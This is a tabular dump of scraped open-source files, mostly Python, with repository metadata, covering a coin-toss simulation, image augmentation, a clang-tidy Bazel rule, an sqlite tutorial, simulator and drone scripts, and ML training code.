max_stars_repo_path
stringlengths 4
182
| max_stars_repo_name
stringlengths 6
116
| max_stars_count
int64 0
191k
| id
stringlengths 7
7
| content
stringlengths 100
10k
| size
int64 100
10k
|
---|---|---|---|---|---|
Problem 1/prob1.py
|
paul028/Machine-Problem-1
| 0 |
2172696
|
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 2 18:15:13 2019
@author: <NAME>
Student Number: 2018-21366
EE 214 MP #1
"""
from statistics import mean
import numpy as np
import matplotlib.pyplot as plt
#function to toss a coin
def toss_coin():
coin=np.random.randint(2)
#use randint function to simulate coin flip
#toss coin returns 1 for heads, 0 for tails
return coin;
def experiment(x,no_toss):
#Fair coin is tossed no_toss times according to the problem,
no_heads=0
no_tails=0
result=np.zeros(no_toss)
print("Tossing Coins 100 Times Trial:"+ str(x+1))
for x in range(0,no_toss):
#simulate coin toss 100 times
result[x]=toss_coin()
for i in result:
#count the number of heads and tails
if i ==1:
no_heads = no_heads+1
if i==0:
no_tails = no_tails+1
return no_heads,no_tails;
def sum_of_3Sk(i,j,k):
sum_3sk = S_heads[i-1]+S_heads[j-1]+S_heads[k-1]
return sum_3sk;
print("Begin Experiment")
no_toss=100 # Set the number of coin toss
no_repetition=1000 #Set the number of experiment repetition
# array for number of heads per experiment
heads_pr=np.zeros(no_repetition)
# array for number of tails per experiment
tails_pr=np.zeros(no_repetition)
for x in range(0,no_repetition): # repeat the experiment 1000 times
heads_pr[x],tails_pr[x] =experiment(x,no_toss)
#returns the number of heads and tails per repetition
S_heads=np.zeros(no_toss)
#Array for storing number of heads per trial
for S_k in range(0,no_toss):
#Calculate how many trials yield n no of heads,
#where the maxinum possible number of heads per trial is 100
#since there is 100 toss per trial
for n in range(0,no_repetition) :
if heads_pr[n]==S_k+1:
S_heads[S_k] = S_heads[S_k]+1
#count the number of trials with S_K+1 heads
c=33
a1=np.zeros(12)
ave1=np.zeros(12)
i=0
for x in range(0,36,3):
a1[i]= sum_of_3Sk(c+x,c+x+1,c+x+2)
ave1[i]= mean([c+x,c+x+1,c+x+2])
print('N_1000(S_%d) + N_1000(S_%d) + N_1000(S_%d) = %d'
% (c+x,c+x+1,c+x+2,a1[i]))
i=i+1
# Plot the bar graph
plot = plt.bar(ave1,a1)
# Add the data value on head of the bar
for value in plot:
height = value.get_height()
plt.text(value.get_x() + value.get_width()/2.,
1.002*height,'%d' % int(height), ha='center', va='bottom')
# Add labels and title
plt.title("Average Number of Heads vs k")
plt.xlabel("Average Number of Heads")
plt.ylabel("k")
plt.savefig('result1.1.png')
# Display the graph on the screen
plt.show()
#1.3 -Probability, Expected value,
print("Calculate probability for 20 trials")
p=np.zeros(20)
E_X=np.zeros(20)
std_X=np.zeros(20)
print("p E(X) STD")
for i in range(20):
p[i]=heads_pr[i]/no_toss
E_X[i]=no_toss*p[i]
std_X[i]=np.sqrt(n*p[i]*(1-p[i]))
print(str(p[i])+" "+str(E_X[i])+" "+str(std_X[i]))
| 2,934 |
tf_sprinkles/sprinkles.py
|
Engineero/sprinkles
| 8 |
2171375
|
"""Progressive Sprinkles implementation in TensorFlow.
Original code based on Stack Overflow question by <NAME>.
https://stackoverflow.com/questions/60567071/efficient-progressive-sprinkles-augmentation-in-tensorflow
"""
import tensorflow as tf
class Sprinkles:
"""Progressive Sprinkles Agumentation.
Args:
num_holes: number of holes to make in an image
side_length: lenght of sides each hole will have.
Keyword Args:
mode: one of [None, 'gaussian', 'salt_pepper']. If None, all sprinkles
will be black. If 'gaussian', sprinkles will be filled with
Gaussian noise. If 'salt_pepper', sprinkles will be randomly
black or white. Default is None.
Returns:
Image with number of holes of specified size cut out.
"""
def __init__(self, num_holes, side_length, mode=None):
if mode is 'salt_pepper':
self.n = num_holes // 2
else:
self.n = num_holes
self.length = side_length
self.mode = mode
def __call__(self, image):
"""Apply sprinkles to an image.
Args:
image: image (preferably tf.float32) to be sprinkled.
Returns:
Image with sprinkles applied.
Raises:
ValueError: if `mode` is not one of the allowed modes or None.
"""
tf.cast(image, tf.float32)
img_shape = tf.shape(image)
if self.mode is None:
rejected = tf.zeros_like(image)
elif self.mode is 'gaussian':
rejected = tf.random.normal(img_shape, dtype=tf.float32)
elif self.mode is 'salt_pepper':
rejected_high = tf.ones_like(image)
rejected_low = tf.zeros_like(image)
else:
raise ValueError(f'Unknown mode "{self.mode}" given.')
rows = img_shape[0]
cols = img_shape[1]
num_channels = img_shape[-1]
if self.mode is 'salt_pepper':
mask1 = self._make_mask(rows, cols, num_channels)
mask2 = self._make_mask(rows, cols, num_channels)
filtered_image = tf.where(mask1, rejected_high, image)
filtered_image = tf.where(mask2, rejected_low, filtered_image)
else:
mask = self._make_mask(rows, cols, num_channels)
filtered_image = tf.where(mask, rejected, image)
return filtered_image
def _make_mask(self, rows, cols, num_channels):
"""Builds the mask for all sprinkles."""
row_range = tf.tile(tf.range(rows)[..., tf.newaxis], [1, self.n])
col_range = tf.tile(tf.range(cols)[..., tf.newaxis], [1, self.n])
r_idx = tf.random.uniform([self.n], minval=0, maxval=rows-1,
dtype=tf.int32)
c_idx = tf.random.uniform([self.n], minval=0, maxval=cols-1,
dtype=tf.int32)
r1 = tf.clip_by_value(r_idx - self.length // 2, 0, rows)
r2 = tf.clip_by_value(r_idx + self.length // 2, 0, rows)
c1 = tf.clip_by_value(c_idx - self.length // 2, 0, cols)
c2 = tf.clip_by_value(c_idx + self.length // 2, 0, cols)
row_mask = (row_range > r1) & (row_range < r2)
col_mask = (col_range > c1) & (col_range < c2)
# Combine masks into one layer and duplicate over channels.
mask = row_mask[:, tf.newaxis] & col_mask
mask = tf.reduce_any(mask, axis=-1)
mask = mask[..., tf.newaxis]
mask = tf.tile(mask, [1, 1, num_channels])
return mask
| 3,522 |
PGCAltas/apps/gsedata/url.py
|
IzayoiRin/PGCAltas
| 0 |
2173175
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r"^features/$", views.FeaturesScreenAPIView.as_view())
]
| 137 |
apps/feedback/unittests/factories.py
|
lsdlab/djshop_toturial
| 0 |
2172464
|
import factory
from faker import Faker
fake = Faker("zh_CN")
class FeedbackFactory(factory.django.DjangoModelFactory):
class Meta:
model = 'feedback.Feedback'
django_get_or_create = ('id', )
type = factory.Iterator(['1', '2', '3', '4'])
content = fake.text()
| 290 |
clang-tidy.bzl
|
xiay-nv/bazel-compilation-database
| 0 |
2173080
|
# Copyright 2020 NVIDIA, Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
load(":aspects.bzl", "compilation_database_aspect")
_clang_tidy_script = """\
#!/bin/bash
pwd
cmd="ln -sf {compdb_file} compile_commands.json"
echo $cmd
eval $cmd
cmd="clang-tidy {options} $@ {sources}"
echo $cmd
eval $cmd
"""
def _clang_tidy_check_impl(ctx):
compdb_file = ctx.attr.src[OutputGroupInfo].compdb_file.to_list()[0]
src_files = ctx.attr.src[OutputGroupInfo].source_files.to_list()
hdr_files = ctx.attr.src[OutputGroupInfo].header_files.to_list()
if len(src_files) == 0:
if ctx.attr.mandatory:
fail("`src` must be a target with at least one source or header.")
else:
test_script = ctx.actions.declare_file(ctx.attr.name + ".sh")
ctx.actions.write(output = test_script, content = "#noop", is_executable = True)
return DefaultInfo(executable = test_script)
sources = " ".join([ src.short_path for src in src_files ])
build_path = compdb_file.dirname.replace(compdb_file.root.path + "/", "")
options = " ".join(ctx.attr.options)
content = _clang_tidy_script.format(
compdb_file = compdb_file.short_path,
build_path = build_path,
sources = sources,
options = options,
)
test_script = ctx.actions.declare_file(ctx.attr.name + ".sh")
ctx.actions.write(output = test_script, content = content, is_executable = True)
runfiles = src_files + hdr_files + [compdb_file]
if ctx.attr.config != None:
files = ctx.attr.config.files.to_list()
if len(files) != 1:
fail("`config` attribute in rule `clang_tidy_test` must be single file/target")
runfiles.append(files[0])
return DefaultInfo(
files = depset([test_script, compdb_file]),
runfiles = ctx.runfiles(files = runfiles),
executable = test_script,
)
clang_tidy_test = rule(
attrs = {
"src": attr.label(
aspects = [compilation_database_aspect],
doc = "Source target to run clang-tidy on.",
),
"mandatory": attr.bool(
default = False,
doc = "Throw error if `src` is not eligible for linter check, e.g. have no C/C++ source or header.",
),
"config": attr.label(
doc = "Clang tidy configuration file",
allow_single_file = True,
),
"options": attr.string_list(
doc = "options given to clang-tidy",
)
},
test = True,
implementation = _clang_tidy_check_impl,
)
| 3,073 |
baseline/__about__.py
|
dmgass/baseline
| 2 |
2171860
|
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Copyright 2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
__all__ = ('__title__', '__summary__', '__uri__', '__version_info__',
'__version__', '__author__', '__maintainer__', '__email__',
'__copyright__', '__license__')
__title__ = "baseline"
__summary__ = "Easy string baseline."
__uri__ = "https://github.com/dmgass/baseline"
__version_info__ = type("version_info", (), dict(serial=0,
major=1, minor=2, micro=1, releaselevel="final"))
__version__ = "{0.major}.{0.minor}.{0.micro}{1}{2}".format(__version_info__,
dict(final="", alpha="a", beta="b", rc="rc")[__version_info__.releaselevel],
"" if __version_info__.releaselevel == "final" else __version_info__.serial)
__author__ = "<NAME>"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__copyright__ = "Copyright 2020 <NAME>"
__license__ = "MIT License ; http://opensource.org/licenses/MIT"
| 2,161 |
modules/__init__.py
|
sloth2012/ner-bert
| 6 |
2172247
|
from .train.train import NerLearner
from .data.bert_data import BertNerData
from .models.bert_models import BertBiLSTMCRF
__all__ = ["NerLearner", "BertNerData", "BertBiLSTMCRF"]
| 181 |
train.py
|
urtrial/generative-models-collection
| 30 |
2172531
|
import os, sys
import argparse
import torch
import visdom
from lib.utils import CroppedCelebA
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--type', type=str, default='BEGAN',
choices=['VAE', 'DCGAN', 'VAEGAN', 'LSGAN', 'WGAN', 'WGANGP', "InfoGAN", 'BEGAN'],
help='The type of GAN: VAE, DCGAN, VAEGAN, LSGAN, WGAN, WGANGP, InfoGAN, BEGAN')
parser.add_argument('--n_epochs', type=int, default=50, help='The number of epochs to run')
parser.add_argument('--start_epoch', type=int, default=0, help='Epoch of preloaded model')
parser.add_argument('--batch_size', type=int, default=128, help='Training batch size')
parser.add_argument('--lr', type=float, default=0.0001, help='Training learning rate')
parser.add_argument('--beta1', type=float, default=0.5, help='Adam beta1')
parser.add_argument('--beta2', type=float, default=0.999, help='Adam beta2')
parser.add_argument('--n_fil', type=int, default=128, help='Min number of filters of conv/deconv layers')
parser.add_argument('--z_dim', type=int, default=88, help='Dimension of latent space')
parser.add_argument('--n_critic', type=int, default=5,
help='Number of discriminator steps per generator step. Applicable for Wassertein models')
parser.add_argument('--n_gen', type=int, default=1,
help='Number of generator steps per discriminator step. Applicable for non-Wassertein models')
parser.add_argument('--use_visdom', type=bool, default=True, help='Use Visdom')
parser.add_argument('--visdom_host', type=str, default='http://localhost', help='Visdom host')
parser.add_argument('--visdom_port', type=int, default=8889, help='Visdom port')
parser.add_argument('--visdom_env', type=str, default='main', help='Visdom environment')
parser.add_argument('--plot_freq', type=int, default=100, help='Visdom plotting frequency')
parser.add_argument('--preload_model', type=bool, default=False,
help='Continue training from the model specified by load_dir and start_epoch')
parser.add_argument('--load_dir', type=str, default='models',
help='Parent directory path to preload the model from')
parser.add_argument('--save_dir', type=str, default='models', help='Parent directory path to save the model')
parser.add_argument('--chkp_freq', type=int, default=20, help='Model checkpoint frequency')
parser.add_argument('--imgs_dir', type=str, default='results',
help='Parent directory path to save the generated images')
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
torch.manual_seed(43)
if args.type == "VAE":
from lib.models.VAE import VAE
Model = VAE
elif args.type == "VAEGAN":
from lib.models.VAEGAN import VAEGAN
Model = VAEGAN
elif args.type == "DCGAN":
from lib.models.DCGAN import DCGAN
Model = DCGAN
elif args.type == "LSGAN":
from lib.models.LSGAN import LSGAN
Model = LSGAN
elif args.type == "WGAN":
from lib.models.WGAN import WGAN
Model = WGAN
elif args.type == "WGANGP":
from lib.models.WGANGP import WGANGP
Model = WGANGP
elif args.type == "InfoGAN":
from lib.models.InfoGAN import InfoGAN
Model = InfoGAN
elif args.type == "BEGAN":
from lib.models.BEGAN import BEGAN
Model = BEGAN
else:
print("Wrong GAN type provided")
sys.exit()
celeba_data = CroppedCelebA("./data")
n_attrs = 40
# enforce directories existence
imgs_dir = os.path.join(args.imgs_dir, args.type)
if not os.path.exists(imgs_dir):
os.makedirs(imgs_dir)
save_dir = os.path.join(args.save_dir, args.type)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
load_dir = os.path.join(args.load_dir, args.type)
if args.use_visdom:
viz = visdom.Visdom(server=args.visdom_host, port=args.visdom_port, env=args.visdom_env)
else:
viz = None
model = Model(args.n_fil, args.z_dim, n_attrs, viz).cuda()
model.init_optimizers(args.lr, args.beta1, args.beta2)
model.n_gen = args.n_gen
model.n_critic = args.n_critic
if args.preload_model:
model.load(load_dir, args.start_epoch-1)
try:
model.train_model(celeba_data, n_epochs=args.n_epochs, batch_size=args.batch_size,
start_epoch=args.start_epoch,
models_dir=save_dir, imgs_dir=imgs_dir,
chkp_freq=args.chkp_freq, plot_freq=args.plot_freq)
except KeyboardInterrupt:
pass
finally:
# doesn't work for now when keyboard interrupted, some problems with file writing
model.save(save_dir)
| 4,894 |
app.py
|
chidaobanjiu/Flask_Web
| 1 |
2169746
|
from flask import Flask
from utils import (
datetimeformat,
abstract,
)
from routes.map import main as map_routes
from routes.blog import main as blog_routes
from routes.todo import main as todo_routes
from routes.admin import main as admin_routes
from routes.index import main as index_routes
from routes.comment import main as comment_routes
app = Flask(__name__)
app.secret_key = 'secret not secret'
app.register_blueprint(map_routes, url_prefix='/map')
app.register_blueprint(blog_routes, url_prefix='/blog')
app.register_blueprint(todo_routes, url_prefix='/todo')
app.register_blueprint(admin_routes, url_prefix='/admin')
app.register_blueprint(comment_routes, url_prefix='/comment')
app.register_blueprint(index_routes)
app.jinja_env.filters['datetime'] = datetimeformat
app.jinja_env.filters['abstract'] = abstract
if __name__ == '__main__':
config = dict(
debug=False,
host='0.0.0.0',
port=2001,
)
app.run(**config)
| 975 |
functions.py
|
Vitor-Padovani/sqlite-python-tutorial
| 0 |
2172730
|
import sqlite3
def line(length):
print('-'*length)
def create_table():
conn = sqlite3.connect('data/database.db')
c = conn.cursor()
c.execute('''CREATE TABLE people
(first_name TEXT,
last_name TEXT,
age INTEGER)''')
def add_one(fname, lname, age):
conn = sqlite3.connect('data/database.db')
c = conn.cursor()
c.execute('INSERT INTO people VALUES (?,?,?)', (fname, lname, age))
conn.commit()
conn.close()
def remove(id):
conn = sqlite3.connect('data/database.db')
c = conn.cursor()
c.execute('DELETE from people WHERE rowid = ?', id)
conn.commit()
conn.close()
def show_all():
conn = sqlite3.connect('data/database.db')
c = conn.cursor()
c.execute('SELECT rowid, * FROM people')
items = c.fetchall()
print('\nID | Nome | Sobrenome | Idade')
line(42)
for item in items:
#print(f'{item[0]}\t{item[1]}\t{item[2]}\t{item[3]}'.expandtabs(16))
print(f'{item[0]}\t', end='')
print(f'{item[1]}\t'.expandtabs(16), end='')
print(f'{item[2]}\t'.expandtabs(16), end='')
print(f'{item[3]}\t', end='\n')
conn.close()
| 1,177 |
playground/lgsvl/executeRandomTests/main.py
|
TrackerSB/IEEEAITestChallenge2021
| 1 |
2172922
|
from queue import Queue
from lgsvl import Simulator, dreamview
from shapely.geometry import LineString, Point
from shapely.ops import unary_union
sim = None
roads = None
road_points = None
junctions = None
allowed_area = None
entry_segment = None
final_segment = None
ego = None
def calc_allowed_area():
global road_points, entry_segment, final_segment, junctions
r = []
q = Queue()
q.put([entry_segment])
while not q.empty():
s = q.get()
succ = s[-1].link.successor
if succ is None:
continue
if succ.elementType == "junction":
for j in junctions:
if j.id != succ.element_id:
continue
for c in j.connections:
if c.incomingRoad != s[-1].id:
continue
aj = True
sext = s.copy()
sext.append(road_points[c.connectingRoad])
q.put(sext)
elif succ.elementType == "road":
su = road_points[succ.element_id]
sext = s.copy()
sext.append(su)
if su.id == final_segment.id:
r.append(sext)
elif len(sext) <= 123:
q.put(sext)
a = []
for rs in r:
ps = []
for s in rs:
ps.extend([(p.x, p.y) for p in s.interpolated_points])
ls = LineString(ps)
a.append(ls.buffer(5))
return unary_union(a)
def test_oracle():
global ego, allowed_area
return allowed_area.contains(Point(ego.state.position.x, ego.state.position.z))
def _execute_test(connection) -> None:
from common.apollo import connect_to_dreamview
from common.config import SupportedDreamViewCar, SupportedMap, ApolloModule
from common.scene import generate_initial_state, get_entry_final_point, load_ego, load_scene
global sim, roads, junctions, road_points, allowed_area, entry_segment, final_segment, ego
load_scene(sim, SupportedMap.BorregasAve)
entry_segment, entry_estimation, final_segment, final_estimation = get_entry_final_point(roads, connection, 20)
allowed_area = calc_allowed_area()
initial_state = generate_initial_state(entry_estimation)
ego = load_ego(sim, SupportedDreamViewCar.Lincoln2017MKZ, initial_state)
# Connect DreamView
ego.connect_bridge("127.0.0.1", 9090)
dv = dreamview.Connection(sim, ego, "127.0.0.1")
dv.set_hd_map('Borregas Ave')
dv.set_vehicle('Lincoln2017MKZ LGSVL')
modules = [
'Localization',
'Transform',
'Routing',
'Prediction',
'Planning',
'Control'
]
spawns = sim.get_spawn()
destination = spawns[0].destinations[0]
dv.setup_apollo(destination.position.x, destination.position.z, modules)
sim.run(10)
timeout = 10
print("test passed")
def _main() -> None:
from common.geometry import interpolate_roads
from common.open_drive_reader import get_roads_and_junctions
global sim, roads, junctions, road_points
# Parse map roads and junctions
roads, junctions = get_roads_and_junctions("borregasave.xodr")
road_points, _ = interpolate_roads(roads)
# Setup simulation
sim = Simulator()
# Find random position on any junction
for junction in junctions:
for connection in junction.connections:
_execute_test(connection)
if __name__ == "__main__":
_main()
| 3,456 |
src/writers/__init__.py
|
jwpttcg66/ExcelToTransfer
| 1 |
2172466
|
# -*- coding: utf-8 -*-
from base_writer import BaseWriter
from lua_writer import LuaWriter
from py_writer import PyWriter
from json_writer import JsonWriter
from java_writer import JavaWriter
| 194 |
dltranz/seq_to_target.py
|
zergey/pytorch-lifestream
| 0 |
2168583
|
import logging
from copy import deepcopy
import pytorch_lightning as pl
import torch
import numpy as np
from pytorch_lightning.metrics.functional.classification import auroc
from dltranz.loss import get_loss, cross_entropy, kl, mape_metric, mse_loss, r_squared
from dltranz.seq_encoder import create_encoder
from dltranz.train import get_optimizer, get_lr_scheduler
from dltranz.models import create_head_layers
from dltranz.trx_encoder import PaddedBatch
from collections import defaultdict
logger = logging.getLogger(__name__)
class EpochAuroc(pl.metrics.Metric):
def __init__(self):
super().__init__(compute_on_step=False)
self.add_state('y_hat', default=[])
self.add_state('y', default=[])
def update(self, y_hat, y):
self.y_hat.append(y_hat)
self.y.append(y)
def compute(self):
y_hat = torch.cat(self.y_hat)
y = torch.cat(self.y)
return auroc(y_hat, y.long())
class DistributionTargets(pl.metrics.Metric):
def __init__(self, col_name):
super().__init__(compute_on_step=False)
self.add_state('y_hat', default=[])
self.add_state('y', default=[])
self.col_name = col_name
self.sign = -1 if self.col_name == 'neg_sum' else 1
def update(self, y_hat, y):
y_hat = y_hat[self.col_name]
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
y = torch.tensor(np.array(y[self.col_name].tolist(), dtype='float64'), device=device)
self.y_hat.append(y_hat)
self.y.append(y)
class CrossEntropy(DistributionTargets):
def __init__(self, col_name):
super().__init__(col_name)
def compute(self):
y_hat = torch.cat(self.y_hat)
y = torch.cat(self.y)
return cross_entropy(y_hat, y)
class KL(DistributionTargets):
def __init__(self, col_name):
super().__init__(col_name)
def compute(self):
y_hat = torch.cat(self.y_hat)
y = torch.cat(self.y)
return kl(y_hat, y)
class MSE(DistributionTargets):
def __init__(self, col_name):
super().__init__(col_name)
def compute(self):
y_hat = torch.cat(self.y_hat)
y = torch.cat(self.y)
return mse_loss(y_hat, torch.log(self.sign * y[:, None] + 1))
class MAPE(DistributionTargets):
def __init__(self, col_name):
super().__init__(col_name)
def compute(self):
y_hat = torch.cat(self.y_hat)
y = torch.cat(self.y)
return mape_metric(self.sign * torch.exp(y_hat - 1), y[:, None])
class LogAccuracy(pl.metrics.Accuracy):
def __init__(self, **params):
super().__init__(**params)
self.add_state('correct', default=torch.tensor([0.0]))
self.add_state('total', default=torch.tensor([0.0]))
def update(self, preds, target):
if len(preds.shape) == 1:
preds = (preds > 0.5).to(dtype=target.dtype)
else:
preds = torch.argmax(preds, dim=1)
self.correct += torch.sum(preds == target)
self.total += target.numel()
def compute(self):
return self.correct / self.total
class R_squared(DistributionTargets):
def __init__(self, col_name):
super().__init__(col_name)
def compute(self):
y_hat = torch.cat(self.y_hat)
y = torch.cat(self.y)
return r_squared(self.sign * torch.exp(y_hat - 1), y[:, None])
class SequenceToTarget(pl.LightningModule):
def __init__(self, params, pretrained_encoder=None):
super().__init__()
self.train_update_n_steps = params.get('train_update_n_steps', None)
self.metrics_test = defaultdict(list) # here we accumulate metrics on each test end
self.metrics_train = defaultdict(list) # here we accumulate metrics on some train bathes (called outside)
head_params = dict(params['head_layers']).get('CombinedTargetHeadFromRnn', None)
self.pos, self.neg = (head_params.get('pos', True), head_params.get('neg', True)) if head_params else (0, 0)
self.cols_ix = params.get('columns_ix', {'neg_sum': 0,
'neg_distribution': 1,
'pos_sum': 2,
'pos_distribution': 3})
self.save_hyperparameters('params')
self.loss = get_loss(params)
if pretrained_encoder is not None:
self._seq_encoder = deepcopy(pretrained_encoder)
self._is_pretrained_encoder = True
else:
self._seq_encoder = create_encoder(params, is_reduce_sequence=True)
self._is_pretrained_encoder = False
self._head = create_head_layers(params, self._seq_encoder)
# metrics
d_metrics = {
'auroc': EpochAuroc(),
'accuracy': LogAccuracy(),
'R2n': R_squared('neg_sum'),
'MSEn': MSE('neg_sum'),
'MAPEn': MAPE('neg_sum'),
'R2p': R_squared('pos_sum'),
'MSEp': MSE('pos_sum'),
'MAPEp': MAPE('pos_sum'),
'CEn': CrossEntropy('neg_distribution'),
'CEp': CrossEntropy('pos_distribution'),
'KLn': KL('neg_distribution'),
'KLp': KL('pos_distribution')
}
params_score_metric = params['score_metric']
if type(params_score_metric) is str:
params_score_metric = [params_score_metric]
metric_cls = [(name, d_metrics[name]) for name in params_score_metric]
self.train_metrics = torch.nn.ModuleDict([(name, mc) for name, mc in metric_cls])
self.valid_metrics = torch.nn.ModuleDict([(name, mc) for name, mc in deepcopy(metric_cls)])
self.test_metrics = torch.nn.ModuleDict([(name, mc) for name, mc in deepcopy(metric_cls)])
@property
def seq_encoder(self):
return self._seq_encoder
def forward(self, x):
x = self._seq_encoder(x)
x = self._head(x)
return x
def training_step(self, batch, _):
x, y = batch
y_h = self(x)
loss = self.loss(y_h, y)
self.log('loss', loss)
if isinstance(x, PaddedBatch):
self.log('seq_len', x.seq_lens.float().mean(), prog_bar=True)
if self.train_update_n_steps and self.global_step % self.train_update_n_steps == 0:
for name, mf in self.train_metrics.items():
mf(y_h, y)
return loss
def validation_step(self, batch, _):
x, y = batch
y_h = self(x)
for name, mf in self.valid_metrics.items():
mf(y_h, y)
def validation_epoch_end(self, outputs):
for name, mf in self.valid_metrics.items():
self.log(f'val_{name}', mf.compute(), prog_bar=True)
def test_step(self, batch, _):
x, y = batch
y_h = self(x)
for name, mf in self.test_metrics.items():
mf(y_h, y)
def test_epoch_end(self, outputs):
for name, mf in self.test_metrics.items():
value = mf.compute().item()
self.log(f'test_{name}', value, prog_bar=True)
self.metrics_test[name] += [value]
def configure_optimizers(self):
params = self.hparams.params
if self._is_pretrained_encoder:
optimizer = self.get_pretrained_optimizer()
else:
optimizer = get_optimizer(self, params)
scheduler = get_lr_scheduler(optimizer, params)
return [optimizer], [scheduler]
def get_pretrained_optimizer(self):
params = self.hparams.params
if params['pretrained.lr'] == 'freeze':
self._seq_encoder.freeze()
logger.info('Created optimizer with frozen encoder')
return get_optimizer(self, params)
parameters = [
{'params': self._seq_encoder.parameters(), 'lr': params['pretrained.lr']},
{'params': self._head.parameters(), 'lr': params['train.lr']},
]
logger.info('Created optimizer with two lr groups')
return torch.optim.Adam(parameters, lr=params['train.lr'], weight_decay=params['train.weight_decay'])
| 8,138 |
examples/add_subproject.py
|
iskunk/hub-rest-api-python
| 68 |
2172177
|
#!/usr/bin/env python
import http.client
http.client._MAXHEADERS = 1000
import argparse
import copy
from datetime import datetime
import json
import logging
import sys
import timestring
from blackduck.HubRestApi import HubInstance, object_id
parser = argparse.ArgumentParser("Add a sub-project to a project")
parser.add_argument("parent_project")
parser.add_argument("parent_version")
parser.add_argument("sub_project")
parser.add_argument("sub_version")
args = parser.parse_args()
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', stream=sys.stderr, level=logging.DEBUG)
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
hub = HubInstance()
parent_project = hub.get_project_version_by_name(args.parent_project, args.parent_version)
sub_project = hub.get_project_version_by_name(args.sub_project, args.sub_version)
hub.add_version_as_component(parent_project, sub_project)
| 959 |
latter found.py
|
kingRovo/PythonCodingChalenge
| 1 |
2172065
|
str="Updesh yadav from uttar pradesh"
cnt=0
fn='a'
for i in str:
if(i==fn):
cnt=cnt+1
print(cnt," Letter Found")
| 125 |
simple_takeoff_Key.py
|
MuAuan/Tello
| 3 |
2170925
|
from time import sleep
import tellopy
import cv2
def handler(event, sender, data, **args):
drone = sender
if event is drone.EVENT_FLIGHT_DATA:
print(data)
def test():
cap = cv2.VideoCapture(0)
while True:
ret, frame = cap.read()
cv2.imshow('test',frame)
key = cv2.waitKey(1)&0xff
print("key=",key,ord('q'))
if key == ord('q'): #113
#cv2.destroyAllWindows()
break
drone = tellopy.Tello()
#drone.subscribe(drone.EVENT_FLIGHT_DATA, handler)
drone.connect()
drone.wait_for_connection(60.0)
drone.takeoff()
while True:
ret, frame = cap.read()
cv2.imshow('test',frame)
key = cv2.waitKey(1)&0xff
#print("key=",key,"up_u=",ord('u'),"down_n=",ord('n'),"left_h=",ord('h'),"right_j=",ord('j'),"finish_f=",ord('f'))
print("key=",key,ord('f'))
if key == ord('n'): #n
drone.down(10)
sleep(5)
elif key==ord('u'): #117: #u
drone.up(10)
sleep(5)
elif key==ord('h'): #104: #h
drone.left(3)
sleep(1)
elif key==ord('j'): #106: #j
drone.right(3)
sleep(1)
elif key==ord('f'): #102: #f
cv2.destroyAllWindows()
break
else:
continue
drone.down(50)
sleep(5)
drone.land()
sleep(5)
drone.subscribe(drone.EVENT_FLIGHT_DATA, handler)
drone.quit()
if __name__ == '__main__':
test()
| 1,564 |
corehq/util/management/commands/show_celery_workers.py
|
dimagilg/commcare-hq
| 471 |
2173098
|
from django.core.management.base import BaseCommand, CommandError
from corehq.util.celery_utils import get_running_workers
class Command(BaseCommand):
"""
Prints the names of all running celery workers. The timeout is the time in
seconds to wait for the worker to respond to the ping command. If no timeout
is given, a default of 10 seconds is used.
Example usages:
python manage.py show_celery_workers
python manage.py show_celery_workers <timeout>
"""
def add_arguments(self, parser):
parser.add_argument(
'timeout',
nargs='?',
type=int,
)
def handle(self, timeout, **options):
if timeout is None:
result = get_running_workers()
else:
result = get_running_workers(timeout=timeout)
if not result:
print('(none)')
else:
for name in result:
print(name)
| 946 |
fpscanner/instructions/image/UpImage.py
|
nikialeksey/fingerprintscanner
| 9 |
2171619
|
# MIT License
#
# Copyright (c) 2018 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
